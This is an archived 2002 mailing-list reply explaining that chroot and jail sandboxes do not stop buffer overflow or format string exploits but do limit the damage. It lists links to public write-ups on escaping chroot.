Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: OT? Are chroots immune to buffer overflows?

From: Jose Nazario <jose () monkey org>
Date: Wed, 22 May 2002 13:50:49 -0400 (EDT)
chroot() and jail() cells are not perfect. while you have reduced the
number of moving parts, parts vulnerable to buffer overflows, you are
still going to have some code that is quite possibly exploitable, via an
{buffer|stack|heap} overflow, a format string exploit, configuration
issue, what have you. accept this as fact. it is, after all, why you put
the code in the restricted environment, to minimize the damage that will
come when it is abused.

getting out of such an environment is well documented. here are some great
pages on the subject:

        http://www.bpfh.net/simes/computing/chroot-break.html
        http://lists.jammed.com/pen-test/2001/07/0134.html
        http://www.linuxsecurity.com/feature_stories/feature_story-99.html
        http://www.linuxgazette.com/issue30/tag_chroot.html
        http://archives.neohapsis.com/archives/nfr-wizards/1997/11/0091.html
        http://lsd-pl.net/papers.html

search packetstormsecurity.org, etc ... its not perfect, but well done its
a severe impediment to abusing the system outright.

___________________________
jose nazario, ph.d.                     jose () monkey org
                                        http://www.monkey.org/~jose/
Previous By Date Next
Previous By Thread Next

Current thread: